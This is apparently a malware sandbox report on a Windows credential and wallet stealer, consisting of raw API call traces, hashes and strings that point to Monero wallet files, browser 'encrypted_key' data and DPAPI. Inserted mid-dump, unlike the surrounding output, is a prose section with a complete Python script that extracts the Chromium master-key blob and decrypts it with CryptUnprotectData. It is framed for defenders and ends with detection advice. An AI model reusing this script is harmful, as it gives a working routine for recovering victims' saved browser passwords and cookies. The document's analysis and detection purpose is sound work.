                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: c1a132b629ff6006a90d6c28cbff0cfff0cfbf764b03f1c9d6217f29e03af30e
                    • Instruction ID: 5c343daa9ab4c61fccb479c1d603e00914ff5dd36714a2c01817ed9d6c46e39d
                    • Opcode Fuzzy Hash: c1a132b629ff6006a90d6c28cbff0cfff0cfbf764b03f1c9d6217f29e03af30e
                    • Instruction Fuzzy Hash: F38123B18101049AEB04FBA5DC92DEE7339AF14304F50496FF106A6091EFBC6A59CB7A
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00491580,00490D92), ref: 0047F54C
                    • lstrlen.KERNEL32(00000000), ref: 0047F56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 0fe98b07042afb4ccaa4003a806a8e696d95eaa03fee0abd71459caafd61d7b9
                    • Instruction ID: b617e1b448a33af3d705ea1fff4bf05e7be2a582f18b625ba2eb1e18ae1b044c
                    • Opcode Fuzzy Hash: 0fe98b07042afb4ccaa4003a806a8e696d95eaa03fee0abd71459caafd61d7b9
                    • Instruction Fuzzy Hash: 76513375D00108AAEB04FBA5DC92DED7338AF54304F50892FF41667191EE7C6A19CBBA
                    Strings
                    • sH, xrefs: 00487111
                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0048718C
                    • sH, xrefs: 004872AE, 00487179, 0048717C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy
                    • String ID: sH$sH$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                    • API String ID: 3722407311-4088985431
                    • Opcode ID: 012c403b5a071571e999b0e421351aec39b5a2d3457c9e8fc3baa29eb5784769
                    • Instruction ID: 4efd463455bf8b31d1b8a87607ffb6ed76c4e8c659e5258606c73d189f96f40f
                    • Opcode Fuzzy Hash: 012c403b5a071571e999b0e421351aec39b5a2d3457c9e8fc3baa29eb5784769
                    • Instruction Fuzzy Hash: CF5182B0D042189FDB14FB91DC95BEEB774AF54304F2044AEE11576281EB786E88CF59
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: c5ea2d586dec96a9d9d2ebd23dbf6aad3bc5cfdc2ffd4a66f4ac56b77362f4e3
                    • Instruction ID: c2714fdc39730bc4dbcb0156ca53f870721a3e0327c8ff253b04ebd95bfec0cd
                    • Opcode Fuzzy Hash: c5ea2d586dec96a9d9d2ebd23dbf6aad3bc5cfdc2ffd4a66f4ac56b77362f4e3
                    • Instruction Fuzzy Hash: AF4161B1D10108AFDB04FFE5C845AEE7774AF04704F10881AE41576250EB78AA06CBAA
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00479D39
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
                      • Part of subcall function 00479AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
                      • Part of subcall function 00479AC0: LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F
                      • Part of subcall function 00479B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00479B84
                      • Part of subcall function 00479B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00479BA3
                      • Part of subcall function 00479B60: LocalFree.KERNEL32(?), ref: 00479BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: febfa2a222d6935049fc205dc9ff99beea5168b9d3a94249d809a41107d788ec
                    • Instruction ID: 9a56156c59f7ce3621b648b6aaa923063c3f9bbd114c39dfb98c4c29c54189c0
                    • Opcode Fuzzy Hash: febfa2a222d6935049fc205dc9ff99beea5168b9d3a94249d809a41107d788ec
                    • Instruction Fuzzy Hash: 133132B5D10109ABDF14EBE4DC85AEF77B8AB48304F14855EE905A7241F7389E04CBA5
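The API sequence in the entry above (StrStrA for `"encrypted_key":"`, CryptStringToBinaryA with flag 1 = CRYPT_STRING_BASE64, the "DPAPI" string, then CryptUnprotectData) is the standard way a stealer recovers the Chromium cookie/password master key from the browser's Local State file. The following Python is an added example written for this page, not code from the report or from the sample: it reproduces that sequence step by step on a constructed Local State fragment so a defender can see exactly which artefact is read and what is handed to DPAPI. The Local State content and the fake blob are constructed here; the DPAPI call is only attempted on Windows and raises elsewhere.

```python
"""Chromium 'Local State' master-key extraction, mirroring the traced API calls.
Added example for this page; the sample data below is constructed, not a real key."""
import base64
import ctypes
import json
import sys

DPAPI_PREFIX = b"DPAPI"            # 5-byte tag Chromium prepends to the DPAPI-wrapped key
CRYPT_STRING_BASE64 = 0x00000001   # the dwFlags value seen in the CryptStringToBinaryA call

# Constructed sample (NOT a real key): a 32-byte stand-in for a CryptProtectData blob,
# base64-encoded under os_crypt.encrypted_key the way Chromium stores it.
FAKE_DPAPI_BLOB = b"\x01\x00\x00\x00" + bytes(range(28))
SAMPLE_LOCAL_STATE = json.dumps(
    {
        "os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + FAKE_DPAPI_BLOB).decode()},
        "profile": {"info_cache": {"Default": {"name": "Person 1"}}},
    },
    separators=(",", ":"),  # Chromium writes prefs compactly, hence the '"encrypted_key":"' marker
)


def find_encrypted_key(local_state_text: str) -> str:
    """Mirror of the StrStrA(buf, '"encrypted_key":"') step: locate the field by
    substring, exactly as the sample does, and return the base64 text."""
    marker = '"encrypted_key":"'
    start = local_state_text.find(marker)
    if start < 0:
        raise ValueError('no "encrypted_key" field in Local State')
    start += len(marker)
    end = local_state_text.index('"', start)
    return local_state_text[start:end]


def dpapi_blob_from_encrypted_key(b64_key: str) -> bytes:
    """CryptStringToBinaryA(..., CRYPT_STRING_BASE64) followed by the 'DPAPI'
    prefix check; returns the blob that CryptUnprotectData expects."""
    raw = base64.b64decode(b64_key)
    if not raw.startswith(DPAPI_PREFIX):
        raise ValueError("encrypted_key is not DPAPI-wrapped (missing 'DPAPI' prefix)")
    return raw[len(DPAPI_PREFIX):]


def extract_master_key_blob(local_state_text: str) -> bytes:
    """Everything the stealer does before calling DPAPI, as one step."""
    return dpapi_blob_from_encrypted_key(find_encrypted_key(local_state_text))


def unprotect_with_dpapi(blob: bytes) -> bytes:
    """CryptUnprotectData(blob, NULL, NULL, NULL, NULL, 0, &out) via ctypes.
    Only meaningful on Windows, in the session of the user who owns the profile
    (DPAPI user keys are per-user); on other platforms this raises."""
    if sys.platform != "win32":
        raise OSError("DPAPI is only available on Windows")

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", ctypes.c_uint32), ("pbData", ctypes.POINTER(ctypes.c_ubyte))]

    crypt32 = ctypes.windll.crypt32
    kernel32 = ctypes.windll.kernel32
    buf = (ctypes.c_ubyte * len(blob)).from_buffer_copy(blob)
    inp = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_ubyte)))
    out = DATA_BLOB()
    if not crypt32.CryptUnprotectData(ctypes.byref(inp), None, None, None, None, 0, ctypes.byref(out)):
        raise ctypes.WinError()
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        kernel32.LocalFree(out.pbData)  # same LocalFree the trace shows after CryptUnprotectData


if __name__ == "__main__":
    blob = extract_master_key_blob(SAMPLE_LOCAL_STATE)
    print("DPAPI blob handed to CryptUnprotectData:", blob.hex())
```

Because the decryption only works under the victim's own DPAPI user key, the stealer must run as that user on that machine; this is why CryptUnprotectData immediately after a read of `Local State` is a high-signal telemetry pattern for stealer triage, and why the literal `"encrypted_key":"` marker is worth a YARA string.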
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004905B7), ref: 004886CA
                    • Process32First.KERNEL32(?,00000128), ref: 004886DE
                    • Process32Next.KERNEL32(?,00000128), ref: 004886F3
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • CloseHandle.KERNEL32(?), ref: 00488761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 58ca6f04c7cdd08cabe785368bfada83c8c9ad23538071c39ef1ba1a222a176d
                    • Instruction ID: 5b326ae94f1f87f5476b603458752519d7ae1d3ae3efed5bb0860ef219c448df
                    • Opcode Fuzzy Hash: 58ca6f04c7cdd08cabe785368bfada83c8c9ad23538071c39ef1ba1a222a176d
                    • Instruction Fuzzy Hash: BD314F71901118ABDB24FB91CC41FEEB778EB45700F5045AEE109A2190DF786A85CFA5
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E00,00000000,?), ref: 004879B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 004879B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00490E00,00000000,?), ref: 004879C4
                    • wsprintfA.USER32 ref: 004879F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: 375ce6bb59398974f1dd6ed8710d135ea266adbfbbd376e2ddbee4e8ed962dfc
                    • Instruction ID: 7eecb7ee6da5003b60a3bf979ab17e46814547a74611366c9a2e616fea87aa0a
                    • Opcode Fuzzy Hash: 375ce6bb59398974f1dd6ed8710d135ea266adbfbbd376e2ddbee4e8ed962dfc
                    • Instruction Fuzzy Hash: 301127F2904118ABCB14DFC9DD45BBEB7F9FB4CB11F10461AF605A2280E2395940CBB5
                    APIs
                    • __getptd.LIBCMT ref: 0048C74E
                      • Part of subcall function 0048BF9F: __amsg_exit.LIBCMT ref: 0048BFAF
                    • __getptd.LIBCMT ref: 0048C765
                    • __amsg_exit.LIBCMT ref: 0048C773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0048C797
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: 16a4fdcfe3093d6c51960b9d639cfed85d4ecb5b961e98e7cb536626ba3dd07b
                    • Instruction ID: f3d18f5d473ed4f3333001d8bf05c5921ec5099271d198795241cd1c59e0bdd3
                    • Opcode Fuzzy Hash: 16a4fdcfe3093d6c51960b9d639cfed85d4ecb5b961e98e7cb536626ba3dd07b
                    • Instruction Fuzzy Hash: 11F06D329042119FD721BBB95887B4E33A0AF00728F20495FF604A62D2DB7C59419FAE
                    APIs
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00484F7A
                    • lstrcat.KERNEL32(?,00491070), ref: 00484F97
                    • lstrcat.KERNEL32(?,01238F70), ref: 00484FAB
                    • lstrcat.KERNEL32(?,00491074), ref: 00484FBD
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
                      • Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
                      • Part of subcall function 00484910: FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
                      • Part of subcall function 00484910: FindClose.KERNEL32(000000FF), ref: 00484B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: 29fd3ab160b7b12c7c91759a694fae5c16b6b70a5008afa9100ff35da5909b7f
                    • Instruction ID: a0b9ad99205540e9752abc56d170f53deb8b1724c8429163fc184b54aa626bba
                    • Opcode Fuzzy Hash: 29fd3ab160b7b12c7c91759a694fae5c16b6b70a5008afa9100ff35da5909b7f
                    • Instruction Fuzzy Hash: 1521DDF69002046BCB54F7B0DC46FED337DA794300F40469EB64992191EE7997C88BA6